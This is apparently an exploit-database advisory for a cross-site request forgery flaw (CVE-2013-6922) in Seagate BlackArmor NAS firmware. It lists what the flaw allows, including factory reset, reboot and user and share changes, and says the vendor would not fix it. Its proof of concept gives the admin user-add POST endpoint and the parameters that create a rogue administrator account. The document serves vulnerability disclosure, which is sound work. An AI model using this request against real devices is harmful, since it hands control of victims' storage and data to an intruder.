62 lines
No EOL
1 KiB
Text
62 lines
No EOL
1 KiB
Text
# Exploit Title: Seagate BlackArmor NAS - Cross Site Request Forgery
|
|
|
|
# Google Dork: N/A
|
|
|
|
# Date: 04-01-2014
|
|
|
|
# Exploit Author: Jeroen - IT Nerdbox
|
|
|
|
# Vendor Homepage: http://www.seagate.com/
|
|
|
|
# Software Link:
|
|
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
|
|
|
|
# Version: sg2000-2000.1331
|
|
|
|
# Tested on: N/A
|
|
|
|
# CVE : CVE-2013-6922
|
|
|
|
#
|
|
|
|
## Description:
|
|
|
|
#
|
|
|
|
# There are multiple CSRF attacks possible, the proof of concept shows how
|
|
it is possible to add
|
|
|
|
# a user with administrative privileges to the system.
|
|
#
|
|
# It is also possible to:
|
|
|
|
#
|
|
|
|
# 1. Factory reset the device
|
|
|
|
# 2. Reboot the device
|
|
|
|
# 3. Add/Edit/Remove users
|
|
# 4. Add/Edit/Remove shares and volumes
|
|
|
|
#
|
|
# This vulnerability was reported to Seagate in September 2013, they stated
|
|
that this will not be fixed.
|
|
|
|
#
|
|
|
|
## Proof of Concept:
|
|
|
|
#
|
|
|
|
# POST: http(s)://<url |
|
|
ip>/admin/access_control_user_add.php?lang=en&gi=a001&fbt=23
|
|
# Parameters:
|
|
|
|
#
|
|
|
|
# username attacker
|
|
# adminright yes
|
|
# fullname hacker
|
|
# userpasswd attackers_password
|
|
# userpasswdcheck attackers_password |